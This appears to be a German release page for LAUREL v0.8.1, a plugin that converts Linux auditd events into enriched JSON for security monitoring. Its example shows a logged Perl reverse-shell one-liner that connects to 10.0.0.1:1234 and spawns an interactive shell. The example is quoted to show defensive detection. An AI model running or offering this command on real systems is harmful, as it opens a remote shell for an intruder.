Zurück zu den Updates
New releaseJul 16, 2026

laurel v0.8.1

Transformieren Sie Linux-Audit-Logs für die SIEM-Nutzung

Teilen

logo

Linux Audit – Nutzbar, Robust, Einfaches Logging

Build Status

LAUREL ist ein Ereignis-Nachbearbeitungs-Plugin für auditd(8), das nützliche, angereicherte JSON-basierte Audit-Logs erzeugt, die für moderne Sicherheitsüberwachungssysteme geeignet sind.

Dokumentation zur aktuellen stabilen Version finden Sie hier.

Warum?

TLDR: Statt Audit-Ereignissen, die so aussehen… type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742… …LAUREL wandelt sie in JSON-Logs um, bei denen das Chaos, das Angreifer/Penetrationstester/Red Teams zu verursachen versuchen, auf den ersten Blick sichtbar wird: { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …} Dies geschieht an der Quelle, da LAUREL auf dem Host läuft, auf dem die Audit-Ereignisse erzeugt werden. Ereignisse werden mit nützlichen Informationen über den übergeordneten Prozess (ppid) angereichert: { "PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}}

Dokumentation

Konfigurations- und Betriebsdetails werden in der Handbuchseite laurel(8) beschrieben. Details zum Log-Format und zu den Begründungen finden Sie in der Handbuchseite laurel-about(7). Die Seite laurel-audit-rules(7) enthält Ratschläge und Beispiele zur Konfiguration von Audit-Regeln, die für die Erkennung von Angriffstaktiken nützlich sind.

Die LAUREL-Installationsanleitung enthält Anweisungen zum Erstellen von LAUREL aus dem Quellcode sowie zur Installation und Konfiguration.

Wir haben LAUREL entwickelt, weil wir mit den Funktionsumfängen und Leistungsmerkmalen bestehender Projekte und Produkte nicht zufrieden waren. Bitte lesen Sie das Dokument Leistung für Details.

Siehe auch

  • ansible-auditd-laurel, eine Ansible-Rolle zur Bereitstellung von auditd + laurel, von @0xFustang / CERT-EU

Lizenz

GNU General Public License, Version 3

Autoren

Das Logo wurde erstellt von Birgit Meyer <[email protected]>.

Kategorien